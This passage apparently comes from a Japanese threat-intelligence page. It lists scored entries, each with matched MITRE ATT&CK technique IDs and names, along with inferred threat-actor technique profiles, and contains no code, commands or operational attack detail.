- T1078 - Valid Accounts
- T1070.004 - File Deletion
MITREへのリンク →
Score: 9.19
Matched TTPs:
- T1090 - Proxy
- T1059 - Command and Scripting Interpreter
- T1189 - Drive-by Compromise
- T1518 - Software Discovery
MITREへのリンク →
Score: 9.02
Matched TTPs:
- T1090 - Proxy
- T1583.006 - Web Services
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1102.002 - Bidirectional Communication
MITREへのリンク →
Score: 7.61
Matched TTPs:
- T1588.001 - Malware
- T1588.002 - Tool
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 8.67
Matched TTPs:
- T1542.002 - Component Firmware
- T1480.001 - Environmental Keying
MITREへのリンク →
Score: 5.81
Matched TTPs:
- T1657 - Financial Theft
- T1566 - Phishing
MITREへのリンク →
Score: 4.86
Matched TTPs:
- T1657 - Financial Theft
- T1486 - Data Encrypted for Impact
MITREへのリンク →
Score: 7.32
Matched TTPs:
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1219.002 - Remote Desktop Software
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
MITREへのリンク →
Score: 3.00
Matched TTPs:
- T1547.001 - Registry Run Keys / Startup Folder
- T1562.001 - Disable or Modify Tools
MITREへのリンク →
Score: 6.93
Matched TTPs:
- T1547.001 - Registry Run Keys / Startup Folder
- T1078 - Valid Accounts
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
MITREへのリンク →
このPulseに関連する脅威アクター (推論ベース)
Score: 0.70
Matched TTPs:
- T1071.001 - Web Protocols
- T1656 - Impersonation
- T1555.003 - Credentials from Web Browsers
- T1059.001 - PowerShell
- T1566.002 - Spearphishing Link
- T1608.001 - Upload Malware
- T1583.006 - Web Services
- T1598 - Phishing for Information
- T1566 - Phishing
- T1055 - Process Injection
- T1219.002 - Remote Desktop Software
- T1566.001 - Spearphishing Attachment
- T1547.001 - Registry Run Keys / Startup Folder
- T1560.001 - Archive via Utility
- T1562.001 - Disable or Modify Tools
- T1598.003 - Spearphishing Link
- T1539 - Steal Web Session Cookie
- T1113 - Screen Capture
- T1583.004 - Server
- T1552.001 - Credentials In Files
- T1059.003 - Windows Command Shell
- T1185 - Browser Session Hijacking
- T1218.011 - Rundll32
- T1657 - Financial Theft
- T1588.002 - Tool
- T1562.004 - Disable or Modify System Firewall
- T1070.004 - File Deletion
- T1505.003 - Web Shell
- T1053.005 - Scheduled Task
- T1190 - Exploit Public-Facing Application
- T1591 - Gather Victim Org Information
- T1140 - Deobfuscate/Decode Files or Information
- T1027.010 - Command Obfuscation
- T1534 - Internal Spearphishing
- T1040 - Network Sniffing
- T1102.001 - Dead Drop Resolver
- T1112 - Modify Registry
- T1518.001 - Security Software Discovery
- T1105 - Ingress Tool Transfer
- T1218.005 - Mshta
- T1003.001 - LSASS Memory
- T1543.003 - Windows Service
- T1041 - Exfiltration Over C2 Channel
- T1056.001 - Keylogging
- T1027 - Obfuscated Files or Information
- T1059.006 - Python
- T1071.002 - File Transfer Protocols
- T1027.012 - LNK Icon Smuggling
- T1102.002 - Bidirectional Communication
- T1059.005 - Visual Basic
- T1620 - Reflective Code Loading
- T1587.001 - Malware
- T1007 - System Service Discovery
- T1204.002 - Malicious File
- T1021.001 - Remote Desktop Protocol
- T1218.010 - Regsvr32
- T1588.005 - Exploits
- T1012 - Query Registry
- T1589.002 - Email Addresses
- T1071.003 - Mail Protocols
- T1057 - Process Discovery
MITREへのリンク →
Score: 0.64
Matched TTPs:
- T1547.009 - Shortcut Modification
- T1033 - System Owner/User Discovery
- T1070 - Indicator Removal
- T1036.003 - Rename Legitimate Utilities
- T1218 - System Binary Proxy Execution
- T1071.001 - Web Protocols
- T1529 - System Shutdown/Reboot
- T1059.001 - PowerShell
- T1566.002 - Spearphishing Link
- T1001.003 - Protocol or Service Impersonation
- T1583.006 - Web Services
- T1047 - Windows Management Instrumentation
- T1134.002 - Create Process with Token
- T1010 - Application Window Discovery
- T1566.001 - Spearphishing Attachment
- T1189 - Drive-by Compromise
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
- T1562.001 - Disable or Modify Tools
- T1106 - Native API
- T1059.003 - Windows Command Shell
- T1218.011 - Rundll32
- T1588.002 - Tool
- T1021.002 - SMB/Windows Admin Shares
- T1562.004 - Disable or Modify System Firewall
- T1070.004 - File Deletion
- T1566.003 - Spearphishing via Service
- T1027.009 - Embedded Payloads
- T1078 - Valid Accounts
- T1053.005 - Scheduled Task
- T1591 - Gather Victim Org Information
- T1140 - Deobfuscate/Decode Files or Information
- T1090.001 - Internal Proxy
- T1105 - Ingress Tool Transfer
- T1218.005 - Mshta
- T1543.003 - Windows Service
- T1041 - Exfiltration Over C2 Channel
- T1056.001 - Keylogging
- T1574.001 - DLL
- T1491.001 - Internal Defacement
- T1202 - Indirect Command Execution
- T1574.013 - KernelCallbackTable
- T1102.002 - Bidirectional Communication
- T1059.005 - Visual Basic
- T1027.007 - Dynamic API Resolution
- T1620 - Reflective Code Loading
- T1587.001 - Malware
- T1021.001 - Remote Desktop Protocol
- T1204.002 - Malicious File
- T1203 - Exploitation for Client Execution
- T1012 - Query Registry
- T1589.002 - Email Addresses
- T1090.002 - External Proxy
- T1547.001 - Registry Run Keys / Startup Folder
- T1057 - Process Discovery
MITREへのリンク →
Related CVEs
このPulseに見つかったCVEはありません。
Pulse – 脅威アクター グラフ
← Pulse一覧に戻る
Trusted Design